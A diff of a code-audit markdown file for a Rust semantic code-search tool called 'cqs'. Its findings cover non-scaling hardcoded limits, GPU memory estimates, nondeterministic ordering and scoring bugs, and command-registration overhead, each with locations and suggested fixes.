-- **Description:** On a 1M-chunk corpus, "5+ callers" is noise — every utility function hits that. The untested-hotspot detector surfaces hundreds-to-thousands of matches because the threshold doesn't scale. Similarly `HEALTH_HOTSPOT_COUNT=5` means `cqs health` always shows top-5 hotspots regardless of whether the corpus has 1k or 1M chunks. `SUGGEST_HOTSPOT_POOL=20` hard-limits pattern detection. None of these are env-configurable. The fix is either corpus-adaptive (thresholds scale with log2(chunk_count), mirroring the `cagra_itopk_max_default` pattern already in `src/cagra.rs:166`) or at minimum env-configurable.
-- **Suggested fix:** Follow the `cagra_itopk_max_default` pattern — `HOTSPOT_MIN_CALLERS` = `(log2(n_chunks) * 0.6).clamp(5, 50)` or similar. At minimum, add `CQS_HOTSPOT_MIN_CALLERS`, `CQS_DEAD_CLUSTER_MIN_SIZE`, `CQS_HEALTH_HOTSPOT_COUNT` env vars.
+- **Location:** `src/cli/pipeline/types.rs:143-160`, `src/embedder/mod.rs:685-689`
+- **Description:** Embedding batch size defaults to 64 regardless of model (768-dim E5 vs 1024-dim BGE-large), regardless of `max_seq_length` (512 BGE vs 2048 nomic), regardless of GPU VRAM. Forward-pass activations scale roughly linearly in `batch * seq_len * hidden_dim`. With BGE-large + 512 seq + 64 batch on the embedder-default ORT path: ~64 × 512 × 1024 × 4 bytes ≈ 130 MB just for one tensor — fits a 4060 8GB. With nomic-coderank + 2048 seq + 64 batch: ~512 MB per tensor × multiple intermediate states → OOM on consumer GPUs. The comment at line 139-141 even says: "Was 32 (backed off from 64 after an undiagnosed crash at 2%). Restored to 64 with debug logging" — meaning we've already had a silent crash on this exact knob, and the resolution was "raise it back and add tracing" rather than make it dim/seq-aware. The eval-only `CQS_EMBED_BATCH_SIZE` env override exists but no auto-tuning.
+- **Suggested fix:** When `CQS_EMBED_BATCH_SIZE` is unset, compute `64 * (768 / model_config.dim) * (512 / model_config.max_seq_length).max(0.25)` rounded to a power of 2. Or query GPU VRAM via `nvml-wrapper` (already a transitive dep via cuVS) and target ~25% of free VRAM. At minimum, document the dim/seq sensitivity in the const's docstring so future operators know to tune.
 
-#### [SHL-V1.29-8]: Risk-score thresholds (`RISK_THRESHOLD_HIGH=5.0`, `RISK_THRESHOLD_MEDIUM=2.0`) and blast_radius ranges (0..=2 / 3..=10) hardcoded, pub const but non-configurable
+#### [SHL-V1.30-7]: `diff::EMBEDDING_BATCH_SIZE = 1000` doesn't scale with model dim — 2.6× memory variance between presets
+- **Difficulty:** easy
+- **Location:** `src/diff.rs:158`
+- **Description:** Comment at line 156-157: "For 20k pairs at ~12 bytes/dim * model_dim, each batch is ~9-12 MB instead of ~240 MB total." The math is correct only for ~1024-dim BGE-large. For 384-dim presets, batch is ~4.6 MB; for 1024-dim it's ~12 MB. More critically, the batch *count* scales with model dim because the 1000 figure was set assuming ~1KB/embedding. With future presets shipping 1536-dim or 2048-dim (or the common case of stacking SPLADE sparse vectors alongside dense), the same batch is 18 MB or 24 MB — still OK, but not what the comment promises. No env override. Worse: the user-visible behavior of `cqs diff` (latency, memory) silently changes when you swap the model preset, with no log or doc.
+- **Suggested fix:** Compute `EMBEDDING_BATCH_SIZE = max(100, 12_000_000 / (model_dim * 12))` (target 12 MB per batch regardless of dim). Or expose `CQS_DIFF_EMBEDDING_BATCH_SIZE` env override and document the dim relationship.
+
+#### [SHL-V1.30-8]: `CagraIndex::gpu_available()` checks only that cuVS resources can be created — no VRAM ceiling, OOMs on 8GB GPUs at ~200k chunks
 - **Difficulty:** medium
-- **Location:** `src/impact/hints.rs:11,13` and `:148-152, 236-240`
-- **Description:** Risk classification uses `score = caller_count * (1.0 - test_ratio)`; `>= 5` → High, `>= 2` → Medium. Blast-radius buckets `0..=2 → Low`, `3..=10 → Medium`, `>10 → High`. These were tuned for cqs-sized projects (~20k chunks). On a large monorepo where every module has 10-100 callers, the High/Medium/Low buckets collapse — almost everything is High. On a small script project, the buckets may never trigger beyond Low. No env override, no config section, no CLI flag. These values determine `cqs review` gate decisions (CI-blocking) so the wrong bucket silently changes the risk classification. The threshold is `pub const` (API-exposed) but nothing in the config schema scales it.
-- **Suggested fix:** Add `[risk]` config section with `high_threshold` / `medium_threshold` / `blast_radius_low_max` / `blast_radius_high_min`, or env vars `CQS_RISK_HIGH` / `CQS_RISK_MEDIUM` / `CQS_BLAST_LOW_MAX` / `CQS_BLAST_HIGH_MIN`. Document the v1.29.0 defaults in `docs/notes.toml` so tuning is traceable.
+- **Location:** `src/cagra.rs:262-264`
+- **Description:** `pub fn gpu_available() -> bool { cuvs::Resources::new().is_ok() }` returns true on any CUDA-capable GPU. Once `chunk_count >= 5000` (the CAGRA threshold), the build path runs `Index::build(&resources, &build_params, &dataset)` where dataset is `Array2::from_shape_vec((n_vectors, dim), flat_data)`. For a 200k-chunk × 1024-dim corpus this is 200k × 1024 × 4 = 819 MB on host, then copied to GPU plus graph overhead (~64 edges × n_vectors × 4 = 51 MB) plus working memory. On an 8GB GPU shared with the embedder model (~1.3 GB BGE-large) and OS/window overhead (~1-2 GB), the build OOMs. The CPU-side `cagra_max_bytes()` (default 2GB) gates host array allocation, but doesn't model GPU VRAM at all. The user reads the `MEMORY.md` line "GPUs: A6000 48GB (training), RTX 4000 8GB (inference)" — cqs is shipped for an A6000 workstation but published to crates.io for everyone else.
+- **Suggested fix:** Query free GPU VRAM via cuVS / cuda-rs / nvml at `gpu_available()` time. Compute estimated build memory (`n_vectors * dim * 4 + graph_degree * n_vectors * 4 + slack`) and return false if it exceeds 80% of free VRAM. Surface as a `tracing::warn!("GPU has X MB free, CAGRA build needs Y MB — falling back to HNSW")`. Add a `CQS_CAGRA_MAX_GPU_BYTES` override for users who want to force-try.
 
-#### [SHL-V1.29-9]: `DAEMON_PERIODIC_GC_INTERVAL_SECS=1800` and `DAEMON_PERIODIC_GC_IDLE_SECS=60` hardcoded, asymmetric with `DAEMON_PERIODIC_GC_CAP` which is env-overridable
+#### [SHL-V1.30-9]: Daemon `worker_threads = min(num_cpus, 4)` hardcoded with no env override — caps shared-runtime parallelism on large machines
 - **Difficulty:** easy
-- **Location:** `src/cli/watch.rs:887-888`
-- **Description:** `DAEMON_PERIODIC_GC_CAP_DEFAULT` has a full env-resolver (`daemon_periodic_gc_cap()` reading `CQS_DAEMON_PERIODIC_GC_CAP`). But the two siblings — interval (30 min) and idle (60 s) — are hardcoded `const u64` with no resolver, no env, no config. A heavy-write environment (watch mode with continuous `cargo check`) might want a shorter interval so the daemon GC catches up; a laptop user on battery might want a longer one. Both knobs are already there in spirit but only one is plumbed. The CAP comment even says "Keeps each tick short" — so letting users tune the interval is the natural follow-through.
-- **Suggested fix:** Mirror `daemon_periodic_gc_cap()` with `daemon_periodic_gc_interval_secs()` / `daemon_periodic_gc_idle_secs()` reading `CQS_DAEMON_PERIODIC_GC_INTERVAL_SECS` / `CQS_DAEMON_PERIODIC_GC_IDLE_SECS`.
+- **Location:** `src/cli/watch.rs:115-119`
+- **Description:** `let worker_threads = std::thread::available_parallelism().map(|n| n.get()).unwrap_or(1).min(4);` — the shared tokio runtime that powers Store, EmbeddingCache, and QueryCache caps at 4 worker threads. On a 24-core workstation (per `MEMORY.md`), this means the daemon's SQLx pool can only meaningfully drive 4 connections worth of concurrent work even if the SQLite pool is sized larger. The hardcoded ceiling came from "the heaviest of the three" pre-#968 default. With an 8-core laptop on battery, `min(8, 4) = 4` is fine; on a 32-core EPYC server, `min(32, 4) = 4` leaves 28 cores idle. No env override.
+- **Suggested fix:** Read `CQS_DAEMON_WORKER_THREADS` (default `min(num_cpus, 4)` to preserve existing behavior). Document at the constant's docstring that this is the shared-runtime size for the daemon process specifically.
 
-#### [SHL-V1.29-10]: `convert/{html,mod}::MAX_FILE_SIZE = 100 MB` duplicated, hardcoded, no env override
+#### [SHL-V1.30-10]: `train_data::MAX_SHOW_SIZE = 50 MB` for `git show` hardcoded — silently drops large files from training-data extraction
 - **Difficulty:** easy
-- **Location:** `src/convert/html.rs:29` (`MAX_CONVERT_FILE_SIZE`) and `src/convert/mod.rs:363` (`MAX_FILE_SIZE` in `markdown_passthrough`)
-- **Description:** Two separate `const X: u64 = 100 * 1024 * 1024;` declarations, same value, same semantic ("refuse to convert files above this size"). Previous audit P3 #106 extracted `DEFAULT_DOC_MAX_PAGES` and P3 #108 extracted `DEFAULT_DOC_MAX_WALK_DEPTH` to `src/limits.rs` with env overrides (`CQS_CONVERT_MAX_PAGES` / `CQS_CONVERT_MAX_WALK_DEPTH`). The per-file size cap got missed. A user converting a 150-MB HTML doc dump or a single large Markdown file silently fails with "exceeds 100 MB" — same class of silent-failure this file's top comment flags as the motivation for env-override plumbing. Also: `convert/webhelp.rs:117` has a separate `MAX_WEBHELP_BYTES = 50 MB` that's *not* the same constant but *is* similarly hardcoded.
-- **Suggested fix:** Extract `DEFAULT_CONVERT_FILE_SIZE: u64 = 100 * 1024 * 1024` and `convert_file_size()` reading `CQS_CONVERT_MAX_FILE_SIZE` into `src/limits.rs` next to `doc_max_pages()` / `doc_max_walk_depth()`. Replace both hardcoded constants. Also thread `MAX_WEBHELP_BYTES` through the same helper or its own env var.
+- **Location:** `src/train_data/git.rs:167`
+- **Description:** `const MAX_SHOW_SIZE: usize = 50 * 1024 * 1024;` — `git_show` returns `Ok(None)` (treated as "skip this file") when stdout exceeds 50 MB. Used during training-data extraction (referenced in `~/training-data/` per memory). Generated SQL bundles, vendored deps, large docs, and minified web assets routinely exceed 50 MB. There's no log line at the call site; the caller (`pub fn git_show -> Result<Option<String>>`) treats `None` as "binary or too large", losing the distinction. No env override, no `--max-show-size` flag. The `crate::limits` module already houses similar caps (`PARSER_MAX_FILE_SIZE`, `parser_max_file_size()`) — this one was missed.
+- **Suggested fix:** Move `MAX_SHOW_SIZE` to `src/limits.rs` with `train_data_git_show_max_bytes()` reading `CQS_TRAIN_GIT_SHOW_MAX_BYTES`. Distinguish "too large" from "binary" in the return type so callers can warn-log truncations explicitly.
 
----
 
 ## Algorithm Correctness
 
@@ -837,516 +915,701 @@ Summary: 7 actionable findings (RB-1, RB-2, RB-3, RB-5, RB-6, RB-8, RB-9, RB-10 
   .then_with(|| a.id.cmp(&b.id))
   ```
 
+#### `token_pack` breaks on first oversized item — drops smaller items that would fit, undershoots budget
+- **Difficulty:** easy
+- **Location:** `src/cli/commands/mod.rs:398-417` (greedy loop in `token_pack`)
+- **Description:** The greedy knapsack loop treats budget overflow as a hard stop:
+  ```rust
+  for idx in order {
+      let tokens = token_counts[idx] + json_overhead_per_item;
+      if used + tokens > budget && kept_any {
+          break;          // <-- should be `continue;`
+      }
+      // ...
+      used += tokens;
+      keep[idx] = true;
+  }
+  ```
+  Once a single item fails to fit, the loop exits — every lower-scored item is dropped, even items that would comfortably fit in the remaining budget. Concrete repro: budget = 300, items sorted by score descending = `[A=250 tokens, B=100 tokens, C=40 tokens]`. After `A` is packed (used=250), `B` fails (`350 > 300`) → `break` → `C` is silently dropped, even though `used + 40 = 290 ≤ 300`. With `continue`, `C` would land in the result and the function would return `(2 items, 290 tokens)` instead of `(1 item, 250 tokens)`. Hits every consumer of `--tokens` — `cqs context`, `cqs explain`, `cqs scout`, `cqs gather`, `cqs task`, the CLI/batch search packers, etc. — under the realistic mix where one large chunk is followed by smaller chunks in the score-ordered list. Particularly bad for code search where high-relevance fixtures (whole modules) often outweigh the per-symbol chunks that would otherwise round out the response.
+- **Suggested fix:** Replace `break` with `continue` so the loop keeps probing for fits, and drop the now-redundant `kept_any` short-circuit on the break (the `kept_any && tokens > budget` check is still needed for the "include at least one" branch). Add a regression test with score-sorted items `[oversized, fits, fits]` asserting the two `fits` survive.
 
----
+#### `map_hunks_to_functions` returns hunks in HashMap iteration order — non-deterministic `cqs impact-diff` JSON across runs
+- **Difficulty:** easy
+- **Location:** `src/impact/diff.rs:38-106` (`map_hunks_to_functions` outer loop), and the downstream truncation at `src/impact/diff.rs:154-168`
+- **Description:** Two layered determinism bugs in the diff-impact pipeline:
+  1. `by_file: HashMap<&Path, Vec<&DiffHunk>>` is iterated at line 66 (`for (file, file_hunks) in &by_file`). HashMap iteration is process-seed-randomized, so the order of `functions: Vec<ChangedFunction>` produced is run-to-run random for any diff that touches more than one file.
+  2. The `analyze_diff_impact_with_graph` cap at line 165 uses `changed.into_iter().take(cap)` (default cap = 500). When the input exceeds 500 functions, *which* 500 survive depends on the random Vec order from step 1 — so on a real "big refactor" diff (>500 changed functions), `cqs impact-diff` output is nondeterministically truncated. Two runs against the same diff give different `changed_functions`, different caller batches, different reverse-BFS results, different test sets, different `via` attributions.
+- **Suggested fix:** Sort `changed` by `(file_path, line_start, name)` after `map_hunks_to_functions` builds it, before the cap takes effect:
+  ```rust
+  let mut changed = map_hunks_to_functions(...);
+  changed.sort_by(|a, b| {
+      a.file.cmp(&b.file)
+          .then(a.line_start.cmp(&b.line_start))
+          .then(a.name.cmp(&b.name))
+      });
+  ```
+  Or build `by_file` as a `BTreeMap`/`Vec<(&Path, …)>` sorted by path. Add a regression test with a diff spanning 3 files and assert `functions` is identical across 100 calls.
+
+#### `drain_pending_rebuild` dedup against rebuild-thread snapshot drops fresh embeddings for chunks whose content changed during the rebuild window
+- **Difficulty:** medium
+- **Location:** `src/cli/watch.rs:1077-1105` (`drain_pending_rebuild`, the `known` filter)
+- **Description:** The non-blocking HNSW rebuild added in #1113 streams a snapshot of `(id, embedding)` from a read-only Store handle in a worker thread, while the watch loop continues capturing newly upserted `(id, embedding)` pairs into `pending.delta`. On swap, the code dedups via:
+  ```rust
+  let known: HashSet<&str> = new_index.ids().iter().map(String::as_str).collect();
+  let to_replay: Vec<(String, Embedding)> = pending.delta
+      .into_iter()
+      .filter(|(id, _)| !known.contains(id.as_str()))
+      .collect();
+  ```
+  `known` contains every chunk id the rebuild thread saw at its snapshot moment. If the watch loop *re-embedded* a chunk during the rebuild window (file edit while rebuild was in flight — exactly the case the non-blocking rebuild was added to handle), the new `(id, Embedding)` pair lands in `pending.delta`, but `known` already contains the id with the *old* embedding. The filter drops the fresh embedding, and the swapped-in HNSW carries the stale vector until the next threshold rebuild. For an editor save loop this means up to 100 saves' worth of stale vectors against the freshly-modified file, exactly defeating the rebuild's purpose. Search for the modified file returns hits on the pre-edit content.
+- **Suggested fix:** Dedup must compare the embedding payload, not just the id. Cleanest: have the rebuild thread return `Vec<(String, blake3_hash)>` alongside the index, and replay any delta whose `(id, hash)` differs from the snapshot. Cheaper alternative: use the chunk's `content_hash` from the store at delta-capture time — `pending.delta` becomes `Vec<(String, Embedding, ContentHash)>`, and the dedup filter checks the content hash matches the rebuilt vector's hash. Add a test that mid-rebuild-window upserts of an existing id produce the *new* embedding in the swapped-in index.
+
+#### `search_reference` weighted threshold filters using post-weight comparison but pre-weight `limit` — multi-ref ranking truncates valid candidates
+- **Difficulty:** easy
+- **Location:** `src/reference.rs:231-258` (`search_reference`, `apply_weight = true` branch)
+- **Description:** The flow is:
+  ```rust
+  let mut results = ref_idx.store.search_filtered_with_index(
+      query_embedding, filter, limit, threshold, ref_idx.index.as_deref(),
+  )?;
+  if apply_weight {
+      for r in &mut results { r.score *= ref_idx.weight; }
+      results.retain(|r| r.score >= threshold);
+  }
+  ```
+  Two coupled algorithm bugs:
+  1. `search_filtered_with_index` is asked for the top `limit` results that satisfy `score ≥ threshold`. With `weight = 0.8` and a `threshold = 0.5`, a chunk that scored 0.62 (above raw threshold) will pass into `results`, then become 0.50 after `*= weight`. A chunk that scored 0.40 (below raw threshold) is dropped by the underlying search — but `0.40 * 1/weight = 0.50` would have been the boundary. The reference therefore *systematically* under-samples its own corpus when `weight < 1.0`: the underlying top-`limit` cap is computed against unweighted scores, missing valid post-weight survivors.
+  2. The post-weight `retain` then re-applies the same `threshold` on weighted scores, double-filtering: a 0.51 raw score (passes raw threshold) becomes 0.408 weighted (fails weighted threshold), so it's dropped *after* the underlying search already spent the cycle on it. The user pays for the search but gets a smaller result set than `limit` even when more candidates exist.
+- **Suggested fix:** When `apply_weight` is true, query the underlying store with a relaxed threshold (`threshold / weight` for weight > 0) and an over-fetch limit, then weight + filter + sort + truncate to `limit` in caller-side code:
+  ```rust
+  let raw_threshold = if apply_weight && ref_idx.weight > 0.0 {
+      threshold / ref_idx.weight
+  } else { threshold };
+  let raw_limit = if apply_weight {
+      // 2x or 3x over-fetch leaves headroom for the weighted retain step
+      (limit as f32 * 2.0).ceil() as usize
+  } else { limit };
+  let mut results = ref_idx.store.search_filtered_with_index(
+      query_embedding, filter, raw_limit, raw_threshold, ref_idx.index.as_deref())?;
+  if apply_weight {
+      for r in &mut results { r.score *= ref_idx.weight; }
+      results.retain(|r| r.score >= threshold);
+      results.sort_by(|a, b| b.score.total_cmp(&a.score).then(a.chunk.id.cmp(&b.chunk.id)));
+      results.truncate(limit);
+  }
+  ```
+  Same fix shape applies to `search_reference_by_name` at line 265-285 (which has the threshold-then-weight ordering inverted, hiding the same bug).
+
+#### `find_type_overlap` chunk_info dedup picks `(file, line)` from random HashMap iteration — non-deterministic `cqs related` per-result file attribution
+- **Difficulty:** easy
+- **Location:** `src/related.rs:131-147` (build of `chunk_info`); `src/related.rs:155-157` (final sort, no tie-break on name)
+- **Description:** Two algorithm bugs in the same loop:
+  1. `chunk_info: HashMap<String, (PathBuf, u32)>` uses `or_insert(...)` to remember the first `(file, line)` seen for each function name. The outer iteration `for chunks in results.values()` walks `results: HashMap<String, Vec<ChunkSummary>>` in process-seed-random order. When a function name appears across multiple type result lists (common — a function uses several types and so shows up in each type's user list), the `or_insert` retains the first arrival, which depends on which type's bucket happens to be first in the random iteration. For a function defined in one file but with overloads or test fixtures in another, the result row's `file` field flips run-to-run.
+  2. The final sort at line 155-157 is `sorted.sort_by_key(|e| Reverse(e.1))` (count only) followed by `truncate(limit)`. Counts in this domain are tiny integers (1, 2, 3) and equal counts are the rule, not the exception. Truncate then picks arbitrary names from a HashMap-ordered Vec.
+  3. Earlier at line 59-65, `type_names` is computed via `HashSet → into_iter().collect::<Vec>()` — also random order — though this only affects bind ordering downstream, not result identity.
+  Net effect: `cqs related <fn>` returns different `shared_types` lists across runs, with different `(file, line)` attribution per result. Defeats `cqs related <fn>` reproducibility for evals or cached agent prompts.
+- **Suggested fix:** (a) Sort `type_counts.into_iter()` results into a deterministic Vec before the count-sort: `sorted.sort_by(|a, b| Reverse(a.1).cmp(&Reverse(b.1)).then(a.0.cmp(&b.0)))` so equal counts break by name asc. (b) For `chunk_info`, walk `results` in sorted-by-key order so the first `or_insert` is deterministic — or store *all* `(file, line)` candidates per name and pick `min` by `(file, line)` after the loop. (c) Convert the HashSet collect at line 63-65 into a sort: `let mut type_names: Vec<_> = ...; type_names.sort(); type_names.dedup();`.
+
+#### CAGRA `search_with_filter` silently under-fills when `included < k` — caller cannot distinguish "few matching candidates" from "filter too restrictive"
+- **Difficulty:** medium
+- **Location:** `src/cagra.rs:520-598` (`search_with_filter`); `src/cagra.rs:344-486` (`search_impl`)
+- **Description:** When the caller asks for `k` results filtered by a predicate, the bitset path does:
+  ```rust
+  let mut included = 0usize;
+  for (i, id) in self.id_map.iter().enumerate() {
+      if filter(id) { bitset[i / 32] |= 1u32 << (i % 32); included += 1; }
+  }
+  if included == n { return CagraIndex::search(self, query, k); }
+  if included == 0 { return Vec::new(); }
+  // else: ask CAGRA for k — but only `included` slots can ever be filled
+  ```
+  When `included < k` (e.g., `cqs search "foo" --include-type Function --lang rust` over a corpus where the Function/Rust subset has 12 vectors but `k = 20`), CAGRA receives `topk = 20` and writes valid `(neighbor, distance)` pairs into the first `included` slots; the remaining `k - included` slots stay at the `INVALID_DISTANCE` sentinel. The `!dist.is_finite()` check at line 473 correctly drops those slots, but the caller above this layer (e.g., `Store::search_filtered_with_index`) sees `Vec<IndexResult>` of length `min(included, k)` with no signal that under-fill happened. Downstream paging / pagination logic that assumes "got fewer than k → end of results" is correct, but a user who set `--limit 20` and gets 12 has no way to distinguish "this filter combination has only 12 hits" from "CAGRA itopk_size cap silently truncated".
+
+  Worse, when `included < k` AND `k > itopk_max` (#988 reported `itopk_size_max=480` while `k=500` failed), CAGRA returns an error from `gpu.index.search(...)` and `search_impl` logs at error then returns `Vec::new()` — silently zeroing out a query that, with `k = included`, would have succeeded. The path doesn't try a fallback with `k = included.min(k)`.
+- **Suggested fix:** Cap `k` at `included` before invoking `search_impl` so CAGRA is always asked for a feasible top-K:
+  ```rust
+  let effective_k = k.min(included);
+  // … then
+  self.search_impl(&gpu, query, effective_k, Some(&bitset_device))
+  ```
+  Add a debug log when `effective_k < k` so eval scripts can see the truncation. As a follow-on, `search_filtered_with_index` should propagate a `degraded` / `truncated` boolean upward when the underlying index returned `< k` results so that the JSON envelope can carry it (matches the pattern used in `analyze_diff_impact_with_graph` for `truncated: bool`).
+
+#### Hybrid SPLADE fusion: `alpha == 0` branch produces unbounded `1.0 + s` scores that mix into a [-1, 1] cosine pool — magic-constant cliff at the SPLADE boundary
+- **Difficulty:** easy
+- **Location:** `src/search/query.rs:649-672` (the fusion lambda inside `splade_fuse_with_dense`)
+- **Description:** The `alpha <= 0.0` branch ("pure re-rank mode") emits:
+  ```rust
+  let score = if alpha <= 0.0 {
+      if s > 0.0 { 1.0 + s } else { d }
+  } else {
+      alpha * d + (1.0 - alpha) * s
+  };
+  ```
+  - `s` is normalized to `[0, 1]` by dividing by `max_sparse` (line 614), but `1.0 + s` is in `[1.0, 2.0]`.
+  - `d` (dense cosine) is in `[-1, 1]` (`cosine_similarity` is not clamped here — `apply_scoring_pipeline`'s `.max(0.0)` runs *later*, after this fusion).
+  - A SPLADE-found chunk with `s = 0.001` (barely-there sparse signal — possible when its single shared subword token barely fires) gets `1.0 + 0.001 = 1.001`, which beats *every* SPLADE-unknown chunk regardless of how relevant they are by dense cosine (best possible 1.0 unclamped).
+  - A SPLADE-found chunk with `s = 0` is *not* in `sparse_scores` because `sparse_scores.insert(&r.id, normalized)` runs even when `normalized = 0` only if the source had `r.score > 0` upstream — confirmed (and `max_sparse > 0` gate at line 614). So the `s > 0` test does what it says, but the cliff at the threshold (any positive sparse hit, no matter how small, dominates dense) is a hidden gotcha. Real-world impact: setting `--alpha 0` (re-rank mode) inverts the result list when a sparse-only weak match exists.
+- **Suggested fix:** Use a calibrated additive boost rather than a magic constant — e.g., `let boost = 1.0 + s * 0.1;` would still place SPLADE-found chunks above any non-found candidate while preserving their dense ordering relative to each other within the boost band. Or, as the cleaner option, treat `alpha == 0` symmetrically with the linear path: `0.0 * d + 1.0 * s = s`, and rely on an `s > d` post-filter to bias toward sparse hits. Either way, drop the `1.0 + s` magic constant — it inflates SPLADE matches into a band the dense path can never reach. Add a doc-test repro: dense pool `[(A, 0.95)]`, sparse pool `[(B, 0.001 normalized)]`, `alpha = 0.0` → expect `A` first, but the current code returns `[B, A]` with `B@1.001`.
+
+#### `apply_scoring_pipeline` / hybrid path drops embedding-score sign without clamping — negative cosine inflates negatives via `name_boost` sign-flip
+- **Difficulty:** easy
+- **Location:** `src/search/scoring/candidate.rs:283-298` (the `(1.0 - name_boost) * embedding_score + name_boost * name_score` blend)
+- **Description:**
+  ```rust
+  let base_score = if let Some(matcher) = ctx.name_matcher {
+      let n = name.unwrap_or("");
+      let name_score = matcher.score(n);
+      (1.0 - ctx.filter.name_boost) * embedding_score + ctx.filter.name_boost * name_score
+  } else { embedding_score };
+  // …
+  let mut score = base_score.max(0.0) * ctx.note_index.boost(file_part, chunk_name);
+  ```
+  `embedding_score` here is raw cosine which is in `[-1, 1]` for un-normalized or oddly-normalized vectors and even for unit-norm vectors when the chunk and query are anti-correlated. The blend `(1 - nb) * e + nb * ns` with `e = -0.3, ns = 0.0, nb = 0.2` produces `-0.24`. The subsequent `.max(0.0)` clamps to `0.0`, which then misses the `score >= threshold` test (`threshold` defaults > 0). So far so good for the negative case.
+  But when `name_boost > 1` is supplied (CLI accepts arbitrary finite `f32`, see the still-pending AC-V1.29-5 from triage), `(1 - nb)` is negative, multiplying `e = 0.9` (a great match) by `-0.5` and adding `nb * ns`. The `.max(0.0)` then turns this into `0.0`, silently demoting good matches to zero. Net effect: an out-of-range `--name-boost` flag does not just mis-weight — it deletes good results. Compounds with the same finding in the existing scratch (#5).
+- **Suggested fix:** Clamp `name_boost` to `[0.0, 1.0]` at `SearchFilter` construction (single fix point that closes both the CLI and config paths), and clamp `embedding_score` to `[0.0, 1.0]` *before* the blend so the linear interpolation is always between two numbers in the same range and never produces a sign-flip:
+  ```rust
+  let embedding_score = embedding_score.clamp(0.0, 1.0);
+  let nb = ctx.filter.name_boost.clamp(0.0, 1.0);
+  let base_score = if let Some(matcher) = ctx.name_matcher {
+      let name_score = matcher.score(name.unwrap_or(""));
+      (1.0 - nb) * embedding_score + nb * name_score
+  } else { embedding_score };
+  ```
+  Add a property test asserting `apply_scoring_pipeline` output ∈ `[0.0, ∞)` for *any* `name_boost`, `embedding_score`, `name_score` ∈ `f32::finite()`.
+
+
 
 ## Extensibility
 
-#### Adding a new CLI command requires coordinated edits across 5-7 files (dispatch fan-out)
-- **Difficulty:** hard
-- **Location:** `src/cli/definitions.rs:285-720` (Commands enum + BatchSupport match), `src/cli/dispatch.rs:67-134, 243-530, 552-609` (Group A + Group B + `command_variant_name`), `src/cli/batch/commands.rs:50-365, 404-531` (BatchCmd enum + `is_pipeable` + dispatch match), `src/cli/batch/handlers/*.rs`, `src/cli/args.rs` (args struct), `src/cli/commands/*/` (handler impl)
-- **Description:** Adding one user-facing command like `cqs foo` forces edits in at least:
-  1. `definitions.rs` — add `Commands::Foo { args, output }` variant
-  2. `definitions.rs:787-891` — add variant to the `batch_support()` exhaustive match (`BatchSupport::Cli` or `::Daemon`)
-  3. `dispatch.rs:67-134` or `:243-530` — add `Some(Commands::Foo {...}) => cmd_foo(...)` arm (Group A early-return or Group B store-using)
-  4. `dispatch.rs:552-609` — add arm to `command_variant_name(&Commands)` telemetry mapper
-  5. `batch/commands.rs:50-315` — add `BatchCmd::Foo { args, output }` variant
-  6. `batch/commands.rs:317-366` — add variant to `is_pipeable()` exhaustive match
-  7. `batch/commands.rs:404-531` — add dispatch arm that calls `handlers::dispatch_foo(...)`
-  8. `batch/handlers/*.rs` — implement `dispatch_foo`
-  9. `cli/args.rs` — add `FooArgs` struct (if shared CLI/batch)
-  10. `cli/commands/*/foo.rs` — implement `cmd_foo` + re-export from `commands/mod.rs`
-  11. Plus: `.claude/skills/cqs-foo/SKILL.md`, bootstrap portable skills list, `CLAUDE.md`/`README.md`/`CONTRIBUTING.md` agent docs, `CHANGELOG.md` — per MEMORY.md "New CLI commands need full ecosystem updates"
+> Note: every original v1.29.0 finding (EX-V1.29-1 through EX-V1.29-9, archived in `docs/audit-triage-v1.30.0.md`) was substantially closed by #1101 (Local LLM provider), #1105 (slots/cache), #1114 (single-registration command registry), the `define_aux_presets!` table, the `define_chunk_types!` macro, the `define_query_categories!` macro, the `ConfigSection` trait + `ArgMatches::value_source()` shift, the `VisibilityRule::{SigStartsTriage, RegexImportSet, NameCase}` extensions, the `NotesListArgs` flatten, and the `approx_download_bytes` field on `ModelConfig`. The findings below are the residual / new pressure points after that wave.
 
-  Verified by reading `dispatch.rs:552-609` (`command_variant_name` is a 57-variant match that duplicates the `Commands` enum purely for a `tracing::info_span!` label — every new command must be added there with no compile-time link between the enum and the label), and `batch/commands.rs:317-366` (`is_pipeable` is a second exhaustive match separate from `batch_support`). Minimum edit points per new command: **5 exhaustive matches + 2 structs + 1 handler module + docs = ~10 places**.
-
-- **Suggested fix:** Collapse the per-variant data onto the enum via trait + table. Introduce `trait Command { fn name(&self) -> &'static str; fn batch_support(&self) -> BatchSupport; fn is_pipeable(&self) -> bool; fn exec(&self, ctx: &CommandContext) -> Result<Output>; }`. Then `Commands` is just a dispatcher that forwards to trait methods. `command_variant_name` becomes `cmd.name()`. The `dispatch.rs` Group A/B match collapses to `cli.command.as_ref().map(|c| c.exec(&ctx))`. Alternatively, if trait-objects are too heavy, run all three classifiers through a single `fn metadata(&self) -> CommandMeta { name, batch_support, is_pipeable }` exhaustive match so adding a variant forces one classification decision, not four in four different files.
-
-#### `where_to_add::extract_patterns` hardcodes Rust, TS/JS, Go custom logic instead of using `LanguageDef::patterns`
+#### Adding a third score signal requires touching two parallel fusion code paths
 - **Difficulty:** medium
-- **Location:** `src/where_to_add.rs:612-720` (three `Some(Language::…)` match arms for `Rust`, `TypeScript | JavaScript`, `Go`) vs the data-driven `Some(lang) => match pattern_def_for(lang)` fall-through
-- **Description:** The function documents "Most languages use data-driven lookup via `pattern_def_for`. Three languages have custom logic: Rust (3-way visibility with `pub(crate)`), TS/JS (custom `require()` import matching), Go (name-based uppercase export detection)." But "custom logic" means adding a 4th language with similar needs (Kotlin `internal`/`public`/`private`, Swift `open`/`public`/`internal`/`private`/`fileprivate`, or Python `_`-prefix conventions) requires another dedicated match arm here, not a row in `languages.rs`. The table already has `VisibilityRule::SigStartsMajority` / `SigContainsMajority` / `SigContainsEitherMajority` — a 3-way `SigStartsTriage { a: "pub(crate)", b: "pub", else_: "private" }` variant would handle the Rust case. TS/JS `require(` detection could be one more `RegexImport { patterns: &["import ", "const ... = require("] }`. Go "uppercase-name = exported" could be `VisibilityRule::NameCase { if_upper: "exported", if_lower: "unexported" }`. Verified by reading `where_to_add.rs:550-600` (the `VisibilityRule` enum already covers 5 styles with clean data, then breaks the abstraction for three languages).
-- **Suggested fix:** Extend `VisibilityRule` with `SigStartsTriage`, `NameCase`, and `RegexImportSet` variants, fold the Rust/TS/JS/Go logic into `LanguageDef::patterns` rows in `languages.rs`, and delete the three custom match arms in `extract_patterns`. Reduces the "to add language X: register grammar + queries + add a row" story from "unless X needs custom logic — then also edit where_to_add.rs" to a pure registry extension.
